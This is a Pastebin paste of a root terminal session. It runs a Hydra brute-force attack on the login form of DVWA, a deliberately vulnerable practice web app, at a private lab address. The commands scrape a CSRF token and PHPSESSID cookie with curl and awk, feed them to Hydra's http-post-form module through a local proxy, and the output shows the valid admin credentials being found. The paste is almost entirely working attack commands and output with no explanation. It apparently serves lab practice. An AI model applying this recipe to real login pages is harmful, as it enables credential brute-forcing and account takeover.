Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [root:~]# rm -f hydra.restore; export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
- [root:~]# CSRF=$(curl -s -c dvwa.cookie 192.168.1.33/DVWA/login.php | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
- [root:~]# SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')
- [root:~]#
- [root:~]# hydra -l admin -p password -e ns -u -F -t 1 -w 10 -W 1 -V 192.168.1.33 http-post-form "/DVWA/login.php:username=^USER^&password=^PASS^&user_token=${CSRF}&Login=Login:S=Location\: index.php:H=Cookie: security=impossible; PHPSESSID=${SESSIONID}"
- Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2015-10-15 21:51:22
- [INFO] Using HTTP Proxy: http://127.0.0.1:8080
- [INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
- [DATA] max 1 task per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
- [DATA] attacking service http-post-form on port 80
- [ATTEMPT] target 192.168.1.33 - login "admin" - pass "admin" - 1 of 3 [child 0]
- [ATTEMPT] target 192.168.1.33 - login "admin" - pass "" - 2 of 3 [child 0]
- [ATTEMPT] target 192.168.1.33 - login "admin" - pass "password" - 3 of 3 [child 0]
- [80][http-post-form] host: 192.168.1.33 login: admin password: password
- [STATUS] attack finished for 192.168.1.33 (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2015-10-15 21:51:50
- [root:~]#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement